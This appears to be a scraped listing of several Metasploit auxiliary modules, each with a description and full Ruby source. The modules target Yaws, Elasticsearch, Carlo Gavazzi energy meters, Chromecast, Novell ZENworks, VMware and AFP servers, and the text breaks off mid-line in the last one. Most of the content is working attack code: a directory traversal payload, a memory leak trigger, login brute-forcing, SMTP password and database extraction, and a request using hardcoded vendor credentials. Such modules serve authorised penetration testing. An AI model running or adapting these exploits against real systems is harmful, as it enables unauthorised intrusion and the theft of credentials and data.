This Metasploit module exploits a directory traversal bug in Yaws v1.9.1 or less. The module can only be used to retrieve files. However, code execution might be possible. Because when the malicious user sends a PUT request, a file is actually created, except no content is written.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info={})    super(update_info(info,      'Name'           => "Yaws Web Server Directory Traversal",      'Description'    => %q{          This module exploits a directory traversal bug in Yaws v1.9.1 or less.        The module can only be used to retrieve files. However, code execution might        be possible. Because when the malicious user sends a PUT request, a file is        actually created, except no content is written.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'sinn3r', # Metasploit module        ],      'References'     =>        [          ['CVE', '2011-4350'],          ['OSVDB', '77581'],          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=757181']        ],      'DisclosureDate' => '2011-11-25'    ))    register_options(      [        Opt::RPORT(8080),        OptString.new('FILEPATH', [false, 'The name of the file to download', 'windows\\win.ini'])      ])  end  def run_host(ip)    # No point to continue if no filename is specified    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?      print_error("Please supply the name of the file you want to download")      return    end    # Create request    traversal = "..\\..\\..\\..\\"    res = send_request_raw({      'method' => 'GET',      'uri'    => "/#{traversal}/#{datastore['FILEPATH']}"    }, 25)    # Show data if needed    if res and res.code == 200      vprint_line(res.to_s)      fname = File.basename(datastore['FILEPATH'])      path = store_loot(        'yaws.http',        'application/octet-stream',        ip,        res.body,        fname      )      print_status("File saved in: #{path}")    else      print_error("Nothing was downloaded")    end  endend

Yaws Web Server Directory Traversal

This Metasploit module exploits a memory disclosure vulnerability in Elasticsearch 7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary queries to Elasticsearch can generate an error message containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. This vulnerabilitys output is similar to heartbleed.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  DEDUP_REPEATED_CHARS_THRESHOLD = 400  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Elasticsearch Memory Disclosure',        'Description' => %q{          This module exploits a memory disclosure vulnerability in Elasticsearch          7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary          queries to Elasticsearch can generate an error message containing previously          used portions of a data buffer.          This buffer could contain sensitive information such as Elasticsearch          documents or authentication details. This vulnerability's output is similar          to heartbleed.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Eric Howard', # discovery          'R0NY' # edb exploit        ],        'References' => [          ['EDB', '50149'],          ['CVE', '2021-22145'],          ['URL', 'https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177']        ],        'DisclosureDate' => '2021-07-21',        'Actions' => [          ['SCAN', { 'Description' => 'Check hosts for vulnerability' }],          ['DUMP', { 'Description' => 'Dump memory contents to loot' }],        ],        'DefaultAction' => 'SCAN',        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [],          'SideEffects' => [] # nothing in the docker logs anyways        }      )    )    register_options(      [        Opt::RPORT(9200),        OptString.new('USERNAME', [ false, 'User to login with', '']),        OptString.new('PASSWORD', [ false, 'Password to login with', '']),        OptString.new('TARGETURI', [ true, 'The URI of the Elastic Application', '/']),        OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])      ]    )  end  def get_version    vprint_status('Querying version information...')    request = {      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    }    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? || datastore['PASSWORD'].present?    res = send_request_cgi(request)    return nil if res.nil?    return nil if res.code == 401    if res.code == 200 && !res.body.empty?      json_body = res.get_json_document      if json_body.empty?        vprint_error('Unable to parse JSON')        return      end    end    json_body.dig('version', 'number')  end  def check_host(_ip)    version = get_version    return CheckCode::Unknown("#{peer} - Could not connect to web service, or unexpected response") if version.nil?    if Rex::Version.new(version) <= Rex::Version.new('7.13.3') && Rex::Version.new(version) >= Rex::Version.new('7.10.0')      return Exploit::CheckCode::Appears("Exploitable Version Detected: #{version}")    end    Exploit::CheckCode::Safe("Unexploitable Version Detected: #{version}")  end  def leak_count    datastore['LEAK_COUNT']  end  # Stores received data  def loot_and_report(data)    if data.to_s.empty?      vprint_error("Looks like there isn't leaked information...")      return    end    print_good("Leaked #{data.length} bytes")    report_vuln({      host: rhost,      port: rport,      name: name,      refs: references,      info: "Module #{fullname} successfully leaked info"    })    if action.name == 'DUMP' # Check mode, dump if requested.      path = store_loot(        'elasticsearch.memory.disclosure',        'application/octet-stream',        rhost,        data,        nil,        'Elasticsearch server memory'      )      print_good("Elasticsearch memory data stored in #{path}")    end    # Convert non-printable characters to periods    printable_data = data.gsub(/[^[:print:]]/, '.')    # Keep this many duplicates as padding around the deduplication message    duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round    # Remove duplicate characters    abbreviated_data = printable_data.gsub(/(.)\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) do |s|      s[0, duplicate_pad] +        ' repeated ' + (s.length - (2 * duplicate_pad)).to_s + ' times ' +        s[-duplicate_pad, duplicate_pad]    end    # Show abbreviated data    vprint_status("Printable info leaked:\n#{abbreviated_data}")  end  def bleed    request = {      'uri' => normalize_uri(target_uri.path, '_bulk'),      'method' => 'POST',      'ctype' => 'application/json',      'data' => "@\n"    }    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? || datastore['PASSWORD'].present?    res = send_request_cgi(request)    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 400    json_body = res.get_json_document    if json_body.empty?      vprint_error('Unable to parse JSON')      return    end    leak1 = json_body.dig('error', 'root_cause')    return if leak1.blank?    leak1 = leak1[0]['reason']    return if leak1.nil?    leak1 = leak1.split('(byte[])"')[1].split('; line')[0]    leak2 = json_body.dig('error', 'reason')    return if leak2.nil?    leak2 = leak2.split('(byte[])"')[1].split('; line')[0]    "#{leak1}\n#{leak2}"  end  def run    memory = ''    1.upto(leak_count) do |count|      vprint_status("Leaking response ##{count}")      memory << bleed    end    loot_and_report(memory)  endend

Elasticsearch Memory Disclosure

This Metasploit module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.

**Carlo Gavazzi Energy Meters Login Brute Force, Extract Info And Dump Plant Database**

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Scanner  def initialize(info={})    super(update_info(info,      'Name' => 'Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database',      'Description' => %{        This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.      },      'References' =>        [          ['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-17-012-03'],          ['CVE', '2017-5146']        ],      'Author' =>         [           'Karn Ganeshen <KarnGaneshen[at]gmail.com>'         ],      'License' => MSF_LICENSE,      'DefaultOptions' =>         {           'SSL' => false,           'VERBOSE' => true         }))    register_options(      [        Opt::RPORT(80),  # Application may run on a different port too. Change port accordingly.        OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'admin']),        OptString.new('PASSWORD', [true, 'A specific password to authenticate with', 'admin'])      ], self.class    )  end  def run_host(ip)    unless is_app_carlogavazzi?      return    end    each_user_pass do |user, pass|      do_login(user, pass)    end    ewplantdb  end  #  # What's the point of running this module if the target actually isn't Carlo Gavazzi box  #  def is_app_carlogavazzi?    begin      res = send_request_cgi(        {          'uri'       => '/',          'method'    => 'GET'        }      )    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")      return false    end    good_response = (      res &&      res.code == 200 &&      res.body.include?('Accedi') || res.body.include?('Gavazzi') || res.body.include?('styleVMUC.css') || res.body.include?('VMUC')    )    if good_response      vprint_good("#{rhost}:#{rport} - Running Carlo Gavazzi VMU-C Web Management portal...")      return true    else      vprint_error("#{rhost}:#{rport} - Application is not Carlo Gavazzi. Module will not continue.")      return false    end  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: Time.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  #  # Brute-force the login page  #  def do_login(user, pass)    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")    # Set Cookie - Box is vuln to Session Fixation. Generating a random cookie for use.    randomvalue = Rex::Text.rand_text_alphanumeric(26)    cookie_value = 'PHPSESSID=' + "#{randomvalue}"    begin      res = send_request_cgi(        {          'uri'       => '/login.php',          'method'    => 'POST',          'headers'   => {            'Cookie' => cookie_value          },          'vars_post' =>            {              'username' => user,              'password' => pass,              'Entra' => 'Sign+In' # Also - 'Entra' => 'Entra' # Seen to vary in some models            }        }      )    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")      return :abort    end    good_response = (      res &&      res.code == 200 &&      res.body.include?('Login in progress') || res.body.include?('Login in corso') &&      res.body.match(/id="error" value="2"/) || (res.code == 302 && res.headers['Location'] == 'disclaimer.php')    )    if good_response      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")      # Extract firmware version      begin        res = send_request_cgi(          {            'uri' => '/setupfirmware.php',            'method' => 'GET',            'headers' => {              'Cookie' => cookie_value            }          }        )      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")        return :abort      end      if res && res.code == 200        if res.body.include?('Firmware Version') || res.body.include?('Versione Firmware')          fw_ver = res.body.match(/Ver. (.*)[$<]/)[1]          if !fw_ver.nil?            print_good("#{rhost}:#{rport} - Firmware version #{fw_ver}...")            report_cred(              ip: rhost,              port: rport,              service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver}]",              user: user,              password: pass            )          end        end      end      #      # Extract SMTP config      #      begin        res = send_request_cgi(          {            'uri'       => '/setupmail.php',            'method'    => 'GET',            'headers'   => {              'Cookie' => cookie_value            }          }        )      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")        return :abort      end      if (res && res.code == 200 && res.body.include?('SMTP'))        dirty_smtp_server = res.body.match(/smtp" value=(.*)[$=]/)[1]        dirty_smtp_user = res.body.match(/usersmtp" value=(.*)[$=]/)[1]        dirty_smtp_pass = res.body.match(/passwordsmtp" value=(.*)[$=]/)[1]        if (!dirty_smtp_server.nil?) && (!dirty_smtp_user.nil?) && (!dirty_smtp_pass.nil?)          smtp_server = dirty_smtp_server.match(/[$"](.*)[$"]/)          smtp_user = dirty_smtp_user.match(/[$"](.*)[$"]/)          smtp_pass = dirty_smtp_pass.match(/[$"](.*)[$"]/)          if (!smtp_server.nil?) && (!smtp_user.nil?) && (!smtp_pass.nil?)            print_good("#{rhost}:#{rport} - SMTP server: #{smtp_server}, SMTP username: #{smtp_user}, SMTP password: #{smtp_pass}")          end        end      else        vprint_error("#{rhost}:#{rport} - SMTP config could not be retrieved. Check if the user has administrative privileges")      end      return :next_user    else      print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")    end  end  #  # Dump EWplant.db database file - No authentication required  #  def ewplantdb    begin      res = send_request_cgi(        {          'uri' => '/cfg/EWplant.db',          'method' => 'GET'        }      )    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")      return :abort    end    if res && res.code == 200      print_status("#{rhost}:#{rport} - dumping EWplant.db")      print_good("#{rhost}:#{rport} - EWplant.db retrieved successfully!")      loot_name = 'EWplant.db'      loot_type = 'SQLite_db/text'      loot_desc = 'Carlo Gavazzi EM - EWplant.db'      path = store_loot(loot_name, loot_type, datastore['RHOST'], res.body , loot_desc)      print_good("#{rhost}:#{rport} - File saved in: #{path}")    else      vprint_error("#{rhost}:#{rport} - Failed to retrieve EWplant.db. Set a higher HTTPCLIENTTIMEOUT and try again. Else, check if target is running vulnerable version.?")      return    end  endend

Carlo Gavazzi Energy Meters Login Brute Force, Extract Info And Dump Plant Database

This Metasploit module enumerates wireless access points through Chromecast.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name' => 'Chromecast Wifi Enumeration',      'Description' => %q{        This module enumerates wireless access points through Chromecast.      },      'Author' => ['wvu'],      'References' => [        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website      ],      'License' => MSF_LICENSE    ))    register_options([      Opt::RPORT(8008)    ])  end  def run_host(ip)    res = scan    return unless res && res.code == 200    waps_table = Rex::Text::Table.new(      'Header' => "Wireless Access Points from #{ip}",      'Columns' => [        'BSSID',        'PWR',        'ENC',        'CIPHER',        'AUTH',        'ESSID'      ],      'SortIndex' => -1    )    res.get_json_document.each do |wap|      waps_table << [        wap['bssid'],        wap['signal_level'],        enc(wap),        cipher(wap),        auth(wap),        wap['ssid'] + (wap['wpa_id'] ? ' (*)' : '')      ]    end    unless waps_table.rows.empty?      print_line(waps_table.to_s)      report_note(        :host => ip,        :port => rport,        :proto => 'tcp',        :type => 'chromecast.wifi',        :data => waps_table.to_csv      )    end  end  def scan    send_request_raw(      'method' => 'POST',      'uri' => '/setup/scan_wifi',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )    send_request_raw(      'method' => 'GET',      'uri' => '/setup/scan_results',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )  end  def enc(wap)    case wap['wpa_auth']    when 1      'OPN'    when 2      'WEP'    when 5      'WPA'    when 0, 7      'WPA2'    else      wap['wpa_auth']    end  end  def cipher(wap)    case wap['wpa_cipher']    when 1      ''    when 2      'WEP'    when 3      'TKIP'    when 4      'CCMP'    else      wap['wpa_cipher']    end  end  def auth(wap)    case wap['wpa_auth']    when 0      'MGT'    when 5, 7      'PSK'    else      ''    end  endend

Chromecast Wifi Enumeration

This Metasploit module exploits a hardcoded user and password for the GetConfig maintenance task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve the configuration parameters of Novell Zenworks Asset Management, including the database credentials in clear text. This Metasploit module has been successfully tested on Novell ZENworks Asset Management 7.5.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'Novell ZENworks Asset Management 7.5 Configuration Access',      'Description'    => %q{          This module exploits a hardcoded user and password for the GetConfig maintenance        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web        Console and can be triggered by sending a specially crafted request to the rtrlet component,        allowing a remote unauthenticated user to retrieve the configuration parameters of        Novell Zenworks Asset Management, including the database credentials in clear text.        This module has been successfully tested on Novell ZENworks Asset Management 7.5.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'juan vazquez' # Also the discoverer        ],      'References'     =>        [          [ 'CVE', '2012-4933' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2012/10/11/cve-2012-4933-novell-zenworks/' ]        ]    ))    register_options(      [        Opt::RPORT(8080),      ])  end  def run_host(ip)    post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"    print_status("#{rhost}:#{rport} - Sending request...")    res = send_request_cgi({      'uri'          => '/rtrlet/rtr',      'method'       => 'POST',      'data'         => post_data,    }, 5)    if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters $live$<\/b><br\/>/      print_good("#{rhost}:#{rport} - File retrieved successfully!")      path = store_loot(        'novell.zenworks_asset_management.config',        'text/html',        ip,        res.body,        nil,        "Novell ZENworks Asset Management Configuration"      )      print_status("#{rhost}:#{rport} - File saved in: #{path}")    else      print_error("#{rhost}:#{rport} - Failed to retrieve configuration")      return    end  endend

Novell ZENworks Asset Management 7.5 Configuration Access

This Metasploit module test for authentication bypass using different HTTP verbs.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  # Exploit mixins should be called first  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::WmapScanDir  include Msf::Auxiliary::WmapScanFile  # Scanner mixin should be near last  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'          => 'HTTP Verb Authentication Bypass Scanner',      'Description'   => %q{        This module test for authentication bypass using different HTTP verbs.      },      'Author'        => ['et [at] metasploit.com'],      'License'       => BSD_LICENSE))    register_options(      [        OptString.new('TARGETURI', [true,  "The path to test", '/'])      ])  end  def run_host(ip)    begin      test_verbs(ip)    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  end  def test_verbs(ip)    verbs = [ 'HEAD', 'TRACE', 'TRACK', 'Wmap', 'get', 'trace' ]    res = send_request_raw({      'uri'          => normalize_uri(target_uri.path),      'method'       => 'GET'    }, 10)    return if not res    if not res.headers['WWW-Authenticate']      print_status("#{full_uri} - Authentication not required [#{res.code}]")      return    end    auth_code = res.code    print_status("#{full_uri} - Authentication required: #{res.headers['WWW-Authenticate']} [#{auth_code}]")    report_note(      :host   => ip,      :proto  => 'tcp',      :sname  => (ssl ? 'https' : 'http'),      :port   => rport,      :type   => 'WWW_AUTHENTICATE',      :data   => "#{target_uri.path} Realm: #{res.headers['WWW-Authenticate']}",      :update => :unique_data    )    verbs.each do |tv|      resauth = send_request_raw({        'uri'          => normalize_uri(target_uri.path),        'method'       => tv      }, 10)      next if not resauth      print_status("#{full_uri} - Testing verb #{tv} [#{resauth.code}]")      if resauth.code != auth_code and resauth.code <= 302        print_good("#{full_uri} - Possible authentication bypass with verb #{tv} [#{resauth.code}]")        # Unable to use report_web_vuln as method is not in list of allowed methods.        report_note(          :host   => ip,          :proto  => 'tcp',          :sname  => (ssl ? 'https' : 'http'),          :port   => rport,          :type   => 'AUTH_BYPASS_VERB',          :data   => "#{target_uri.path} Verb: #{tv}",          :update => :unique_data        )      end    end  endend

HTTP Verb Authentication Bypass Scanner

This Metasploit module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::VIMSoap  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'VMWare Web Login Scanner',      'Description'    => 'This module attempts to authenticate to the VMWare HTTP service        for VmWare Server, ESX, and ESXI',      'Author'         => ['theLightCosine'],      'References'     =>        [          [ 'CVE', '1999-0502'] # Weak password        ],      'License'        => MSF_LICENSE,      'DefaultOptions' => { 'SSL' => true }    )    register_options(      [        OptString.new('URI', [true, "The default URI to login with", "/sdk"]),        Opt::RPORT(443)      ])  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: 'vmware',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: DateTime.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def run_host(ip)    return unless is_vmware?    each_user_pass { |user, pass|      result = vim_do_login(user, pass)      case result      when :success        print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)        return if datastore['STOP_ON_SUCCESS']      when :fail        print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"      end    }  end  # Mostly taken from the Apache Tomcat service validator  def is_vmware?    soap_data =      %Q|<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">      <env:Body>      <RetrieveServiceContent xmlns="urn:vim25">        <_this type="ServiceInstance">ServiceInstance</_this>      </RetrieveServiceContent>      </env:Body>      </env:Envelope>|    res = send_request_cgi({      'uri'     => normalize_uri(datastore['URI']),      'method'  => 'POST',      'agent'   => 'VMware VI Client',      'data'    => soap_data    }, 25)    unless res      vprint_error("#{rhost}:#{rport} Error: no response")      return false    end    fingerprint_vmware(res)  rescue ::Rex::ConnectionError => e    vprint_error("#{rhost}:#{rport} Error: could not connect")    return false  rescue => e    vprint_error("#{rhost}:#{rport} Error: #{e}")    return false  end  def fingerprint_vmware(res)    unless res      vprint_error("#{rhost}:#{rport} Error: no response")      return false    end    return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')    os_match = res.body.match(/<name>([\w\s]+)<\/name>/)    ver_match = res.body.match(/<version>([\w\s\.]+)<\/version>/)    build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)    full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)    if full_match      print_good "#{rhost}:#{rport} - Identified #{full_match[1]}"      report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])    end    unless os_match and ver_match and build_match      vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMWare")      return false    end    if os_match[1].include?('ESX') || os_match[1].include?('vCenter')      # Report a fingerprint match for OS identification      report_note(        :host  => rhost,        :ntype => 'fingerprint.match',        :data  => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }      )      return true    end  endend

VMWare Web Login Scanner

This Metasploit module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::VIMSoap  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'VMWare Enumerate User Accounts',      'Description'    => %Q{        This module will log into the Web API of VMWare and try to enumerate        all the user accounts. If the VMware instance is connected to one or        more domains, it will try to enumerate domain users as well.      },      'Author'         => ['theLightCosine'],      'License'        => MSF_LICENSE,      'DefaultOptions' => { 'SSL' => true }    )    register_options(      [        Opt::RPORT(443),        OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]),        OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ])      ])  end  def run_host(ip)    if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success      # Get local Users and Groups      user_list = vim_get_user_list(nil)      tmp_users = Rex::Text::Table.new(        'Header'  => "Users for server #{ip}",        'Indent'  => 1,        'Columns' => ['Name', 'Description']      )      tmp_groups = Rex::Text::Table.new(        'Header'  => "Groups for server #{ip}",        'Indent'  => 1,        'Columns' => ['Name', 'Description']      )      unless user_list.nil?        case user_list        when :noresponse          print_error "Received no response from #{ip}"        when :expired          print_error "The login session appears to have expired on #{ip}"        when :error          print_error "An error occurred while trying to enumerate the users for #{domain} on #{ip}"        else          user_list.each do |obj|            if obj['group'] == 'true'              tmp_groups << [obj['principal'], obj['fullName']]            else              tmp_users <<  [obj['principal'], obj['fullName']]            end          end          print_good tmp_groups.to_s          store_loot('host.vmware.groups', "text/plain", datastore['RHOST'], tmp_groups.to_csv , "#{datastore['RHOST']}_esx_groups.txt", "VMWare ESX User Groups")          print_good tmp_users.to_s          store_loot('host.vmware.users', "text/plain", datastore['RHOST'], tmp_users.to_csv , "#{datastore['RHOST']}_esx_users.txt", "VMWare ESX Users")        end      end      # Enumerate Domains the Server is connected to      esx_domains = vim_get_domains      case esx_domains      when :noresponse        print_error "Received no response from #{ip}"      when :expired        print_error "The login session appears to have expired on #{ip}"      when :error        print_error "An error occurred while trying to enumerate the domains on #{ip}"      else        # Enumerate Domain Users and Groups        esx_domains.each do |domain|          tmp_dusers = Rex::Text::Table.new(            'Header'  => "Users for domain #{domain}",            'Indent'  => 1,            'Columns' => ['Name', 'Description']          )          tmp_dgroups = Rex::Text::Table.new(            'Header'  => "Groups for domain #{domain}",            'Indent'  => 1,            'Columns' => ['Name', 'Description']          )          user_list = vim_get_user_list(domain)          case user_list          when nil            next          when :noresponse            print_error "Received no response from #{ip}"          when :expired            print_error "The login session appears to have expired on #{ip}"          when :error            print_error "An error occurred while trying to enumerate the users for #{domain} on #{ip}"          else            user_list.each do |obj|              if obj['group'] == 'true'                tmp_dgroups << [obj['principal'], obj['fullName']]              else                tmp_dusers <<  [obj['principal'], obj['fullName']]              end            end            print_good tmp_dgroups.to_s            f = store_loot('domain.groups', "text/plain", datastore['RHOST'], tmp_dgroups.to_csv , "#{domain}_esx_groups.txt", "VMWare ESX #{domain} Domain User Groups")            vprint_status("VMWare domain user groups stored in: #{f}")            print_good tmp_dusers.to_s            f = store_loot('domain.users', "text/plain", datastore['RHOST'], tmp_dgroups.to_csv , "#{domain}_esx_users.txt", "VMWare ESX #{domain} Domain Users")            vprint_status("VMWare users stored in: #{f}")          end        end      end    else      print_error "Login failure on #{ip}"      return    end  endend

VMWare Enumerate User Accounts

This Metasploit module fetches AFP server information, including server name, network address, supported AFP versions, signature, machine type, and server flags.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Exploit::Remote::AFP  def initialize(info={})    super(update_info(info,      'Name'         => 'Apple Filing Protocol Info Enumerator',      'Description'  => %q{        This module fetches AFP server information, including server name,        network address, supported AFP versions, signature, machine type,        and server flags.      },      'References'     =>        [          [ 'URL', 'https://web.archive.org/web/20130309051753/https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]        ],      'Author'       => [ 'Gregory Man <man.gregory[at]gmail.com>' ],      'License'      => MSF_LICENSE    ))  end  def run_host(ip)    print_status("AFP #{ip} Scanning...")    begin      connect      response = get_info      report(response)    rescue ::Timeout::Error    rescue ::Interrupt      raise $!    rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT    rescue ::Exception      raise $!      print_error("AFP #{rhost}:#{rport} #{$!.class} #{$!}")    ensure      disconnect    end  end  def report(response)    report_info = "AFP #{rhost}:#{rport} Server Name: #{response[:server_name]} \n" +    "AFP #{rhost}:#{rport}  Server Flags: \n" +    format_flags_report(response[:server_flags]) +    "AFP #{rhost}:#{rport}  Machine Type: #{response[:machine_type]} \n" +    "AFP #{rhost}:#{rport}  AFP Versions: #{response[:versions].join(', ')} \n" +    "AFP #{rhost}:#{rport}  UAMs: #{response[:uams].join(', ')}\n" +    "AFP #{rhost}:#{rport}  Server Signature: #{response[:signature]}\n" +    "AFP #{rhost}:#{rport}  Server Network Address: \n" +    format_addresses_report(response[:network_addresses]) +    "AFP #{rhost}:#{rport}   UTF8 Server Name: #{response[:utf8_server_name]}"    lines = "AFP #{rhost}:#{rport}:#{rport} 